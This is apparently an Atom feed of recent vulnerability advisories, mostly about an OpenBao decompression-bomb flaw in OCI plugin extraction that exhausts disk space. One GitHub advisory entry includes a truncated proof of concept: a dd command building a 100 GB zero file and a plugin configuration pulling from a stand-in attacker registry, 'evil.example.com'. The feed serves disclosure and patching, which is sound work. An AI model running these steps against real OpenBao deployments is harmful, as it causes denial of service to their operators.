<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T07:03:07.620161+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-08728</id>
    <title>bdu:2026-08728</title>
    <updated>2026-10-03T07:03:07.695687+00:00</updated>
    <content>bdu:2026-08728</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-08728"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bit-openbao-2026-39396</id>
    <title>BIT-openbao-2026-39396 — OpenBao has Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)</title>
    <updated>2026-10-03T07:03:07.695724+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Bitnami: openbao</p>
<p>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/bit-openbao-2026-39396"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-292283</id>
    <title>EUVD-2026-292283</title>
    <updated>2026-10-03T07:03:07.695762+00:00</updated>
    <content>EUVD-2026-292283</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-292283"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-39396</id>
    <title>fkie_cve-2026-39396</title>
    <updated>2026-10-03T07:03:07.695775+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-39396"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-r65v-xgwc-g56j</id>
    <title>GHSA-r65v-xgwc-g56j — OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)</title>
    <updated>2026-10-03T07:03:07.695802+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/openbao/openbao</p>
<p>### Summary</p>
<p>`ExtractPluginFromImage()` in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written.
An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.</p>
<p>The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature.</p>
<p>### Details</p>
<p>#### Root cause</p>
<p>`helper/pluginutil/oci/downloader.go:301`:</p>
<p>```go
if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {
```</p>
<p>`io.Copy()` reads until EOF with no size limit.  
The tar `header.Size` field is never validated before the copy, and `mutate.Extract` decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.</p>
<p>### PoC</p>
<p>1. Set up a malicious OCI registry
2. Create a decompression bomb binary:
   ```bash
   dd if=/dev/zero bs=1G count=100 &gt; /tmp/bomb-binary
   ```
3. Package it in a minimal OCI image
4. Push to the malicious registry
5. Configure victim OpenBao to use this registry:
   ```hcl
   plugin "secrets" "bomb" {
     image       = "evil.example.com/plugin"
     version     = "v1.0.0"
     binary_name = "openbao-plu…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-r65v-xgwc-g56j"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2026:10594-1</id>
    <title>openSUSE-SU-2026:10594-1 — openbao-2.5.3-1.1 on GA media</title>
    <updated>2026-10-03T07:03:07.695848+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>openbao-2.5.3-1.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2026:10594-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1189</id>
    <title>WID-SEC-W-2026-1189 — OpenBao: Mehrere Schwachstellen</title>
    <updated>2026-10-03T07:03:07.695869+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in OpenBao ausnutzen, um Sicherheitsvorkehrungen zu umgehen, um einen Denial of Service Angriff durchzuführen, und um einen SQL-Injection Angriff durchzuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1189"/>
  </entry>
</feed>
